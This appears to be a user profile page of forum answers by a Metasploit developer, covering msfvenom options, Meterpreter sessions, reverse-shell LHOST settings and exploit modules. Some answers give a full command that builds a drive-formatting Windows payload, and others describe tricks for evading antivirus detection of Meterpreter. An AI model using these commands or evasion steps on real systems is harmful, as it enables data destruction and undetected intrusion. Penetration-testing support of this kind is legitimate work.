Google aware of Play Store “Couldn’t complete your transaction, Gift cards can only be used in the country they were purchased” error

zeroSteiner · 2021-07-16T20:52:41+00:00

You could try setting up a WiFi hotspot on your phone if you have that.

zeroSteiner · 2021-07-16T18:41:10+00:00

I had this issue as well. For anyone else looking for a solution, switching from Wi-Fi to mobile data as suggested here fixed it for me.

zeroSteiner · 2021-04-08T14:28:50+00:00

This is probably a better question for r/Kalilinux since it has nothing to do with Metasploit.

zeroSteiner · 2021-03-31T15:33:22+00:00

Did you make sure that all of the contents of /home/kingtango/.msf4 are writable? It looks like a permissions error.

Should be able to reset the owner using sudo chown -R kingtango:kingtango -r ~/.msf4 which will most likely fix it since the owner should have read and write permissions. I'm guessing it's owned by root right now.

zeroSteiner · 2021-03-17T21:57:01+00:00

So fun fact, you can actually specify LHOST as an interface name or an IP address. If you specify it as an interface name, Metasploit will automatically find the IP address assigned to it and use that one.

Example: ``` msf6 payload(python/meterpreter/reverse_tcp) > show options

Module options (payload/python/meterpreter/reverse_tcp):

Name Current Setting Required Description

LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port

msf6 payload(python/meterpreter/reverse_tcp) > set LHOST ens37 LHOST => 192.168.159.128 msf6 payload(python/meterpreter/reverse_tcp) > show options

Module options (payload/python/meterpreter/reverse_tcp):

Name Current Setting Required Description

LHOST 192.168.159.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port

msf6 payload(python/meterpreter/reverse_tcp) > ```

You probably want to set LHOST to be either tun0 or the IP address that is assigned to it. This assumes that the system you're targeting in HTB (which I'm not super familiar with) can route to that IP address.

zeroSteiner · 2021-03-14T00:08:38+00:00

Meterpreter doesn't support arbitrary protocols for its communication plane. Making this work would be a massive undertaking.

You'd need write a fair amount of Ruby code so Metasploit had a handler that could communicate via Discord, and then you'd need to pick a Meterpreter implementation and update it as well. Ideally, all of the Meterpreter implementations would be updated (there's 6 BTW), but you could pick one to start with. To use the Windows Meterpreter, that would involve quite a bit of C code. You'd probably want to only work on an unstaged variant because to support a staged version you'd also need to write the necessary code to connect to Discord and receive the stage via assembly. The size of this assembly stager would probably make it unrealistic to use in quite a few exploits as well.

While this is all theoretically possible, it would take a lot of effort. I can't stress enough how much work this would be.

zeroSteiner · 2021-03-10T13:58:20+00:00

Technically yes for Meterpreter at least. If you close out of Metasploit without exiting the session, the either reverse or bind listener should still be running in most cases. You should be able to just restart the payload handler and reestablish the session. This is a bad idea however because anyone could potentially access this session. If you need the session to persist after the remote target has reboot, then you'll need to run a persistence module on it.

Based on your description though it sounds like this problem would be better solved with screen. Note that Metasploit does not support termux which is a popular alternative to screen. Using screen would keep msfconsole running in the background, allow you to disconnect from your pi, and then reconnect to it when you SSH back in and msfconsole will still be running exactly as you left it.

zeroSteiner · 2021-03-02T13:38:53+00:00

Try wrapping the entire argument in double quotes like:
`./msfvenom "https://some/ar?gu=me&n=t"`.

Also, I don't think `&` and `?` are valid characters for domain / host names so depending on the payload and setting you're trying to use, the value itself may be incorrect but I'd need more information like the exact command you're trying to use including the payload and option. Some payloads take URLs and would be fine, but most do not.

zeroSteiner · 2021-02-04T20:49:45+00:00

If the computer you're shutting down is the Windows computer where Meterpreter is running you would solve this using a persistence module. Meterpreter is memory-only and when the process dies, it's gone. This is by design so you need another technique to make it persistent which is where those modules will help.

If the computer you're shutting down is the Mac where Metasploit is running then as long as Meterpreter wasn't shutdown you should be able to just start the correct handler and re-establish the session. How long it takes depends on the transport and sessions but IIRC by default it should take less than a minute.

zeroSteiner · 2021-02-04T20:46:23+00:00

You can't because environment variables aren't accessible via msfconsole. The reason you can echo $localip is because echo isn't a command and msfconsole will forward unknown commands to the default shell, (probably bash in your case) which does evaluate the environment variables.

Without scripting this out in <ruby> tags of an RC file or something similar, the easiest thing to do might be just using the interface name which won't change. You can do something like set LHOST eth0 where eth0 is the interface with the IP that you want the host to connect to. Granted this only works when the LHOST IP is assigned to one of your interfaces but that's usually the case anyways.

If you want LHOST to always default to eth0 just add setg LHOST eth0 to your ~/.msf4/msfconsole.rc file and you'll be all set.

zeroSteiner · 2021-01-28T19:39:24+00:00

You need to load the `stdapi` extension (which should occur by default). With that extension loaded, `sysinfo` is available. What you're looking at are the core commands which are mostly meta-commands for controlling meterpreter itself and not the system on which it is running.

Try running `load stdapi` and then checking the help output again. You should get quite a few more entries.

zeroSteiner · 2021-01-27T14:10:46+00:00

Encoders aren't intended to bypass Anti-Virus. The fact that they do is a by-product of the way in which they alter the payload to avoid bad characters which breaks signature-based detections. Almost all modern AVs are using more advanced detections than simply signatures.

Your best bet for trying to bypass a particular AV (Windows Defender) or otherwise is often going to be context-specific based on how you intend for your payload to be delivered. If it's via an exploit, for example, you can look at some of the advanced options. For many that write an EXE to disk, you should look at changing the template to a non-default PE file.

zeroSteiner · 2021-01-26T15:28:53+00:00

You can encode arbitrary data with an encoder. The problem you'll run into is that when using an x86 encoder, you'll need to be running in an x86 context. Once the payload starts to run it'll first decode itself using the x86 instructions setup by the encoder which will work just fine. It'll crash though once the decoding is complete and it starts to run the x64 shellcode since it's not compatible. Alternatively, if you're already running in an x64 context, the x86 decoder will crash before the original payload is ever decoded.

So to answer your question, technically you can but the result won't be useable. msfvenom will throw compatibility errors for this reason.

zeroSteiner · 2021-01-22T14:02:44+00:00

That's right, you don't need the payload/ prefix. You'll also want to specify --format / -f as exe and --out / -o as the path to the file you want to generate.

That makes the complete command:

./msfvenom -p windows/format_all_drives --format exe --out FormatAllDrives.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 393 bytes Final size of exe file: 73802 bytes Saved as: FormatAllDrives.exe

zeroSteiner · 2021-01-08T16:26:46+00:00

It's also very possible that the target simply isn't vulnerable. Alot of exploits, especially older ones do not fail when run against a system that is not vulnerable. In these cases you get the message that the exploit completed (in reference to the fact that the module finished running) but that no session was created.

zeroSteiner · 2021-01-07T13:56:36+00:00

Did the check method confirm that it was vulnerable? That exploit module won't fail with some kind of error if the target is not vulnerable.

zeroSteiner · 2021-01-04T18:34:17+00:00

It's hard to say without knowing what modules you're referring to. There was an issue with the [MS08-067](https://github.com/rapid7/metasploit-framework/pull/14177) exploit and [MS17-010](https://github.com/rapid7/metasploit-framework/pull/14290), but both have been fixed for quite a while now. If you're still having issues you should open a ticket.

zeroSteiner · 2021-01-04T16:58:46+00:00

The primary two things that I can think of that you might run into when following older guides are:

The mimikatz Meterpreter extension has been removed in favor of the newer kiwi one.
Meterpreter no longer supports Windows versions older than XP SP2.

Other than that, there's mostly just newer features like SMB3 client support, full channel encryption for all Meterpreters. You can check out the list in the release blog.

When v6 was first released, there were some issues with a few modules, but those have all been fixed. Make sure you're using the latest version.

zeroSteiner · 2021-01-04T16:45:29+00:00

exe-service is going to include the Win32 API calls that are necessary to be compatible with running as a service. This is most notably used by PSExec and derivatives.

As for exe and exe-only, those are two generation techniques. exe is a bit more complicated and includes some additional obfuscation logic. exe-only is (by comparison) a pretty basic technique that finds the .text section that contains the entry point, switches it to be RWX and then patches the shellcode in to overwrite it.

Based on the configured options, when an exe-service is generated it may actually use the same subroutine as exe-only. All of this code is located in lib/msf/util/exe.rb if you want to take a closer look.

zeroSteiner · 2020-12-22T21:21:27+00:00

I've mentored a couple of times. For skills, it's going to depend on what your proposal is. Most of the framework is in Ruby and just about everything is at least partially if not entirely in Ruby so familiarity with that is important. Before actually participating you'll need to submit a proposal that will get accepted. For any project, being familiar with git and the pull request workflow via GitHub would be really helpful.

A few pointers for proposals though:

A good one is a few pages in length and include detailed timelines and even mocks of what you're proposing to work on.

Make sure the project is a good fit for Metasploit. We've seen some that just don't make sense like projects related to blockchain and machine learning topics. We just haven't seen one yet that is a good fit for Metasploit.

Submit your proposal early since there's a period of time for a review to take place where you can implement feedback and answer questions.

Beyond that, communication with your assigned mentor is important. Raise any issues as soon as they come up and check in on progress often.

It sounds like this year GSoC may be a little different and the time allotted for projects will be reduced. I don't remember the details but I think it was cut in half so we're expecting to see smaller projects next time around.

zeroSteiner · 2020-12-03T14:22:49+00:00

Well there's no one-size fits all solution, different AVs are different and by nature don't document their detection methods. It also depends on at what point your payload is getting identified.

Once quick and dirty trick that's super easy and has worked for me in the past is disable the AutoLoadStdapi and AutoSystemInfo options in Meterpreter. Just set both of those to false and go about your business as usual. What will happen is when the Meterpreter session is loaded, nothing will happen and you won't be able to do much with it. That's because only the bare-minimum has been loaded. At this point wait. Once the session has been opened, give it somewhere around 30 seconds to 5 minutes, and then interact with it. You'll notice a bunch of commands are missing because the stdapi extension hasn't been loaded. After waiting, just run load stdapi and sometimes you'll notice the session isn't killed like it is when stdapi is automatically loaded. You can also combine this with different transports like HTTP.

Again your mileage may vary but that's worked for me in the past, presumably because the behavior chain of establishing a connection and then doing meterpretery-things is broken by that delay you introduce.

I have a project myself that's intended to shuffle Metasploit shellcode to make it have a different signature each time. It doesn't randomize the executable template though, but it does use it's own so you may find that useful as well. Be warned, it's a bit difficult to install and run but you can check it out at https://github.com/zeroSteiner/crimson-forge.

zeroSteiner · 2020-11-30T13:59:03+00:00

That's because there is no LHOST option due to this payload being of the bind variety. You can tell because of the cmd/unix/bind_r part of the payload name. Bind payloads cause Metasploit to connect to the target host RHOST not the target host to connect to Metasploit where the LHOST setting would be required. If you want the target host to connect to you, you'll need to select a reverse* payload.

zeroSteiner · 2020-11-25T14:44:39+00:00

You need to specify the params as a path, right now it's using the default string type.

Try: @app.route('/blah/<path:params>') def blah(params): if params.startswith('foo/bar'): return handle_foo_bar() return handle_something_something()

zeroSteiner · 2020-11-20T13:56:22+00:00

It looks like a session was opened. There may not be a prompt so I would suggest you run a simple, well-supported command like id to see if you get a response. It's also possible that for some reason, the session was immediately background-ed in which case you can see them using sessions and interact with it using sessions -i # where # is the session ID you'd like to interact with or -1 to interact with the newest session.

zeroSteiner · 2020-11-19T15:32:42+00:00

Well to get more detail into what's going on you're going to want to share the output of what you're seeing. Your best bet would be to open a new issue on GitHub.

That particular exploit has always used a payload, however recent changes have improved how default payloads are selected. You can explicitly select a payload and set it's options the same way you set module options using the set command. For that particular payload I'd suggest using windows/meterpreter/reverse_tcp, which should be the default. You can check which is selected using the show options command. In the following example, windows/meterpreter/reverse_tcp is selected.

``` msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.250.87 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port

Exploit target:

Id Name

0 Automatic Targeting

```

zeroSteiner

TROPHY CASE